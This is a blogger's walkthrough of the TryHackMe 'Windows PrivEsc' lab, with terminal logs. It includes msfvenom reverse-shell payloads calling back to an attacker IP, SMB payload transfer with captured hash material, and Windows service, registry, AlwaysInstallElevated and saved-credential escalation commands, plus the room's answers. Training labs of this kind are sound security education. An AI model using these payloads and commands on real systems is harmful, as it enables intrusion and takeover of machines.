In this walk through, we will be going through the Windows PrivEsc from Tryhackme. This room is rated as Medium on the platform and let us practice our Windows Privilege Escalation skills on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM. So, let’s get started without any delay.
Table of Contents
Task 1 – Deploy the Vulnerable Windows VM
Task 2 – Generate a Reverse Shell Executable
Question 1 – Generate a reverse shell executable and transfer it to the Windows VM. Check that it works!
Done
wh1terose@fsociety:~/CTF/TryHackme/Windows Privesc$ sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.11.103 LPORT=4444 -f exe -o reverse.exe /usr/bin/msfvenom: 14: cd: can't cd to /home/wh1terose/CTF/TryHackme/Windows [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of exe file: 7168 bytes Saved as: reverse.exe
wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali . Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.225.25,49812) [*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\user,WIN-QBA94KB3IOF) [*] User WIN-QBA94KB3IOF\user authenticated successfully [*] user::WIN-QBA94KB3IOF:4141414141414141:465098c53c0be448156c5c7263e69cbf:0101000000000000009f7b8e5783d90116c1888a72084c21000000000100100073005600420053006e0079006a0065000300100073005600420053006e0079006a0065000200100061004f005a006d004e007500450044000400100061004f005a006d004e0075004500440007000800009f7b8e5783d901060004000200000008003000300000000000000000000000002000008f4f897470911f8ee7ca820d6a5763695c6af5de3e0a5e30d62a0f7bae1ff2cc0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310038002e00310031002e00310030003300000000000000000000000000 [-] Unknown level for query path info! 0x109 [*] Disconnecting Share(1:IPC$) [*] Disconnecting Share(2:KALI) [*] Handle: 'ConnectionResetError' object is not subscriptable [*] Closing down connection (10.10.225.25,49812) [*] Remaining connections []
Task 3 – Service Exploits – Insecure Service Permissions
Question 1 – What is the original BINARY_PATH_NAME of the daclsvc service?
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc RW daclsvc SERVICE_QUERY_STATUS SERVICE_QUERY_CONFIG SERVICE_CHANGE_CONFIG SERVICE_INTERROGATE SERVICE_ENUMERATE_DEPENDENTS SERVICE_START SERVICE_STOP READ_CONTROL C:\PrivEsc>sc qc daclsvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: daclsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\DACL Service\daclservice.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DACL Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\PrivEsc>sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\"" [SC] ChangeServiceConfig SUCCESS C:\PrivEsc>net start daclsvc
C:\Program Files\DACL Service\daclservice.exe
Task 4 – Service Exploits – Unquoted Service Path
Question 1 – What is the BINARY_PATH_NAME of the unquotedsvc service?
C:\PrivEsc>sc qc daclsvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: daclsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\DACL Service\daclservice.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DACL Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\PrivEsc>sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\"" [SC] ChangeServiceConfig SUCCESS C:\PrivEsc>net start daclsvc The service is not responding to the control function. More help is available by typing NET HELPMSG 2186. C:\PrivEsc>sc qc unquotedsvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: unquotedsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Unquoted Path Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\" C:\Program Files\Unquoted Path Service Medium Mandatory Level (Default) [No-Write-Up] RW BUILTIN\Users RW NT SERVICE\TrustedInstaller RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe" 1 file(s) copied. C:\PrivEsc>net start unquotedsvc
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
Task 5 – Service Exploits – Weak Registry Permissions
Question 1 – Read and follow along with the above.
Done
C:\PrivEsc>sc qc regsvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: regsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Insecure Registry Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc HKLM\System\CurrentControlSet\Services\regsvc Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM KEY_ALL_ACCESS RW BUILTIN\Administrators KEY_ALL_ACCESS RW NT AUTHORITY\INTERACTIVE KEY_ALL_ACCESS C:\PrivEsc>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f The operation completed successfully. C:\PrivEsc>net start regsvc
Task 6 – Service Exploits – Insecure Service Executables
Question 1 – Read and follow along with the above.
Done
C:\PrivEsc>sc qc filepermsvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: filepermsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\File Permissions Service\filepermservice.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : File Permissions Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Program Files\File Permissions Service\filepermservice.exe Medium Mandatory Level (Default) [No-Write-Up] RW Everyone FILE_ALL_ACCESS RW NT AUTHORITY\SYSTEM FILE_ALL_ACCESS RW BUILTIN\Administrators FILE_ALL_ACCESS RW WIN-QBA94KB3IOF\Administrator FILE_ALL_ACCESS RW BUILTIN\Users FILE_ALL_ACCESS C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y The system cannot find the file specified. C:\PrivEsc>copy \\10.18.11.103\kali\reverse.exe C:\PrivEsc\reverse.exe 1 file(s) copied. C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y 1 file(s) copied. C:\PrivEsc>sc qc filepermsvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: filepermsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\File Permissions Service\filepermservice.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : File Permissions Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Program Files\File Permissions Service\filepermservice.exe Medium Mandatory Level (Default) [No-Write-Up] RW Everyone FILE_ALL_ACCESS RW NT AUTHORITY\SYSTEM FILE_ALL_ACCESS RW BUILTIN\Administrators FILE_ALL_ACCESS RW WIN-QBA94KB3IOF\Administrator FILE_ALL_ACCESS RW BUILTIN\Users FILE_ALL_ACCESS C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y 1 file(s) copied. C:\PrivEsc>net start filepermsvc The service is not responding to the control function. More help is available by typing NET HELPMSG 2186.
Task 7 – Registry – AutoRuns
Question 1 – Read and follow along with the above.
Done
C:\PrivEsc>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SecurityHealth REG_EXPAND_SZ %windir%\system32\SecurityHealthSystray.exe My Program REG_SZ "C:\Program Files\Autorun Program\program.exe" C:\PrivEsc>C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe" AccessChk v4.02 - Check access of files, keys, objects, processes or services Copyright (C) 2006-2007 Mark Russinovich Sysinternals - www.sysinternals.com C:\Program Files\Autorun Program\program.exe Medium Mandatory Level (Default) [No-Write-Up] RW Everyone FILE_ALL_ACCESS RW NT AUTHORITY\SYSTEM FILE_ALL_ACCESS RW BUILTIN\Administrators FILE_ALL_ACCESS RW WIN-QBA94KB3IOF\Administrator FILE_ALL_ACCESS RW BUILTIN\Users FILE_ALL_ACCESS C:\PrivEsc>copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y 1 file(s) copied.
Task 8 – Registry – AlwaysInstallElevated
Question 1 – Read and follow along with the above.
Done
wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.11.103 LPORT=1234 -f msi -o reverse.msi [?] Would you like to init the webservice? (Not Required) [no]: no [?] Would you like to delete your existing data and configurations? []: yes Clearing http web data service credentials in msfconsole Running the 'init' command for the database: Existing database found, attempting to start it Starting database at /home/wh1terose/.msf4/db...success [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of msi file: 159744 bytes Saved as: reverse.msi wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ ls reverse.exe reverse.msi wh1terose@fsociety:~/CTF/TryHackme/WindowsPrivesc$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali . [sudo] password for wh1terose: Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.165.120,49710) [*] AUTHENTICATE_MESSAGE (WIN-QBA94KB3IOF\user,WIN-QBA94KB3IOF) [*] User WIN-QBA94KB3IOF\user authenticated successfully [*] user::WIN-QBA94KB3IOF:4141414141414141:b978bb131fc26e4ee84d9fc63507ea58:01010000000000000054203b1e84d901dbcec77ee99a0fbd000000000100100062004b007700440048005200520077000300100062004b0077004400480052005200770002001000440046005800680066007000700072000400100044004600580068006600700070007200070008000054203b1e84d901060004000200000008003000300000000000000000000000002000007d4b5ce9918fb05e3cd6a3d21ca39d3aa0b524095c2842e45278ef703d4077850a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310038002e00310031002e00310030003300000000000000000000000000 [-] Unknown level for query path info! 0x109 [*] Disconnecting Share(1:IPC$) [*] Disconnecting Share(2:KALI)
C:\PrivEsc>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer AlwaysInstallElevated REG_DWORD 0x1 C:\PrivEsc>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer AlwaysInstallElevated REG_DWORD 0x1 C:\PrivEsc>copy \\10.18.11.103\kali\reverse.msi C:\PrivEsc\reverse.msi 1 file(s) copied. C:\PrivEsc>msiexec /quiet /qn /i C:\PrivEsc\reverse.msi C:\PrivEsc>
Task 9 – Passwords – Registry
Question 1 – What was the admin password you found in the registry?
password123
Task 10 – Passwords – Saved Creds
Question 1 – Read and follow along with the above.
Done
C:\PrivEsc>cmdkey /list Currently stored credentials: Target: WindowsLive:target=virtualapp/didlogical Type: Generic User: 02nfpgrklkitqatu Local machine persistence Target: Domain:interactive=WIN-QBA94KB3IOF\admin Type: Domain Password User: WIN-QBA94KB3IOF\admin C:\PrivEsc>runas /savecred /user:admin C:\PrivEsc\reverse.exe Attempting to start C:\PrivEsc\reverse.exe as user "WIN-QBA94KB3IOF\admin" ... C:\PrivEsc>savecred.bat C:\PrivEsc>cmdkey /list Currently stored credentials: Target: WindowsLive:target=virtualapp/didlogical Type: Generic User: 02nfpgrklkitqatu Local machine persistence Target: Domain:interactive=WIN-QBA94KB3IOF\admin Type: Domain Password User: WIN-QBA94KB3IOF\admin C:\PrivEsc>
Task 11 – Passwords – Security Account Manager (SAM)
Question 1 – What is the NTLM hash of the admin user?
a9fdfa038c4b75ebc76dc855dd74f0da
Task 12 – Passwords – Passing the Hash
Task 13 – Scheduled Tasks
Task 14 – Insecure GUI Apps
Task 15 – Startup Apps
Task 16 – Token Impersonation – Rogue Potato
Question 1 – Name one user privilege that allows this exploit to work.
SeImpersonatePrivilege
Question 2 – Name the other user privilege that allows this exploit to work.
SeAssignPrimaryTokenPrivilege
Task 17 – Token Impersonation – PrintSpoofer
Task 18 – Privilege Escalation Scripts
Also Read: Tryhackme – Windows Fundamentals 2
So that was “Windows PrivEsc” for you. In this room, we covered a variety of Windows privilege escalation techniques which we can use once we landed in a Windows machine. Well, the best thing on any machine is to be System/admin and today we have learned on how we can get to that point. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.